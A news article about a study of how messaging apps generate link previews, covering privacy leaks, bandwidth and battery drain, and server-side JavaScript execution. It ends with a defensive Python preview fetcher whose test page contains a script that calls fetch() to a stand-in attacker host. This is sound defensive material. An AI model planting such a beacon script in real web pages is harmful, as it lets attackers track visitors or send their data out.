The study shows which messengers leak your data, drain your battery and more


Link previews are a ubiquitous feature found in just about every chat and messaging app, and for good reason. They make online conversations easier by showing images and text associated with the linked file.

Unfortunately, they can also leak our sensitive data, consume our limited bandwidth, drain our batteries and, in one case, expose links in chats that are supposed to be end-to-end encrypted. According to a study published on Monday, the worst offenders included messengers from Facebook, Instagram, LinkedIn and Line. More on that shortly. First, a quick discussion of how previews work.

When a sender inserts a link in a message, the app displays it in the conversation along with text (usually a heading) and images that accompany the link. It usually looks something like this:

To do this, the app itself, or a proxy the app designates, must visit the link, open the file it points to and inspect the content. This can expose users to attack. The most serious risks are those that can lead to malware being downloaded. Other kinds of abuse can force an app to download files so large that the app crashes, drains the battery or exhausts a limited bandwidth allowance. If the link leads to private material, for example a tax return stored in a private OneDrive or Dropbox account, the app's server may be able to view that file and retain a copy indefinitely.

The researchers behind Monday's report, Talal Haj Bakry and Tommy Mysk, found that Facebook Messenger and Instagram were the worst offenders. As the following demonstration shows, both apps download and copy a linked file in its entirety, even if it is gigabytes in size. Again, this is a problem if the file is something users want to keep private.

Link previews: Instagram servers download every link sent in direct messages, even a file 2.6 GB in size.

This is also problematic because the apps can consume large amounts of bandwidth and battery. Both apps also execute JavaScript contained in the linked page. That is a problem because users cannot verify the safety of that JavaScript, and they cannot expect Messenger to have the same level of exploit protection as a modern browser.

Link previews: how attackers can execute JavaScript code on Instagram servers.

Haj Bakry and Mysk reported their findings to Facebook, and the company said both apps were working as intended. LinkedIn did only marginally better: instead of copying files of any size, it copied only the first 50 megabytes.

When the Line app opens an encrypted message and finds a link, it appears to send the link to a Line server to generate the preview. "We believe this undermines the purpose of end-to-end encryption as LINE servers know everything about the links being sent through the app and who is passing which links to whom," wrote Haj Bakry and Mysk.

Discord, Google Hangouts, Slack, Twitter and Zoom also copy files, but cap the amount of data at 15 to 50 MB. The following table compares each app in the study.

Talal Haj Bakry and Tommy Mysk

All in all, the study is good news because it shows that most messaging apps get things right. Signal, Threema, TikTok and WeChat, for example, let users opt out of receiving link previews altogether. For truly sensitive messages, and for users who want as much privacy as possible, that is the best setting. Even when these apps do provide previews, they use relatively safe means to render them.
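What "relatively safe means" can look like in practice, as an added example that is not code from the study or from any of the messengers it covers: a preview generator that caps how much of the linked file it reads (so a multi-gigabyte link cannot be copied in full or used to burn bandwidth), parses only HTML and only with a tag parser (so JavaScript in the page is never executed), and refuses targets that resolve to private or link-local addresses (so the preview server cannot be pointed at internal services). The 512 KB cap, the User-Agent string and the sample HTML are assumptions made for the example; the study's apps used limits of 15 to 50 MB.

```python
"""Bounded, script-free link-preview fetcher (constructed example)."""
import io
import ipaddress
import socket
import urllib.request
from html.parser import HTMLParser
from urllib.parse import urlsplit

MAX_BYTES = 512 * 1024   # assumed cap; apps in the study allowed 15-50 MB
TIMEOUT_SECONDS = 5


class _MetaParser(HTMLParser):
    """Collects <title> and Open Graph <meta> tags. Script bodies are seen
    as plain text by handle_data and ignored, never evaluated."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self.og = {}
        self._in_title = False

    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self._in_title = True
        elif tag == "meta":
            a = dict(attrs)
            prop = a.get("property") or ""
            if prop.startswith("og:") and a.get("content"):
                self.og.setdefault(prop, a["content"])

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def is_public_address(host):
    """True only if every address the host resolves to is globally routable
    (rejects loopback, RFC 1918, link-local such as 169.254.169.254, etc.)."""
    try:
        addrs = [ipaddress.ip_address(host)]
    except ValueError:
        try:
            infos = socket.getaddrinfo(host, None)
        except socket.gaierror:
            return False
        addrs = [ipaddress.ip_address(info[4][0]) for info in infos]
    return bool(addrs) and all(a.is_global for a in addrs)


def read_bounded(stream, limit=MAX_BYTES):
    """Read at most `limit` bytes from a file-like object and report
    whether the body was cut off, instead of copying the whole file."""
    data = stream.read(limit + 1)
    truncated = len(data) > limit
    return data[:limit], truncated


def extract_preview(body, content_type):
    """Turn a (possibly truncated) body into title/description/image.
    Anything that is not HTML is never inspected; only the URL would be shown."""
    if content_type.split(";")[0].strip().lower() != "text/html":
        return {"title": "", "description": "", "image": ""}
    parser = _MetaParser()
    parser.feed(body.decode("utf-8", errors="replace"))
    return {
        "title": parser.og.get("og:title") or parser.title.strip(),
        "description": parser.og.get("og:description", ""),
        "image": parser.og.get("og:image", ""),
    }


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse redirects: a public URL could otherwise bounce to a private host
    after the address check has already passed."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


_opener = urllib.request.build_opener(_NoRedirect)


def fetch_preview(url):
    """Network path (not exercised offline): applies the same checks to a live URL.
    A refused redirect surfaces as urllib.error.HTTPError."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not is_public_address(parts.hostname or ""):
        return None
    req = urllib.request.Request(url, headers={"User-Agent": "preview-bot/0.1"})  # assumed UA
    with _opener.open(req, timeout=TIMEOUT_SECONDS) as resp:
        body, _ = read_bounded(resp)
        return extract_preview(body, resp.headers.get("Content-Type", ""))


# Constructed sample page: real metadata plus a script that would rewrite the
# title and beacon out if it were ever executed. It is not.
SAMPLE_HTML = (b"<html><head><title>Quarterly report</title>\n"
               b'<meta property="og:title" content="Q3 numbers">\n'
               b'<meta property="og:image" content="https://example.com/q3.png">\n'
               b'<script>document.title="owned";fetch("https://attacker.example/");</script>\n'
               b"</head><body>body text</body></html>")

if __name__ == "__main__":
    print(extract_preview(SAMPLE_HTML, "text/html; charset=utf-8"))
    print(read_bounded(io.BytesIO(b"x" * 1000), limit=64)[1])   # True: truncated
    print([is_public_address(h) for h in ("127.0.0.1", "10.0.0.5", "169.254.169.254", "8.8.8.8")])
```

The three functions map one-to-one onto the failure modes in the study: `read_bounded` is the size cap that Facebook Messenger and Instagram lacked, `extract_preview` is the no-JavaScript rendering path, and `is_public_address` plus the refused redirect keep a preview server from being used as a proxy into its own network.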


Steven Gregory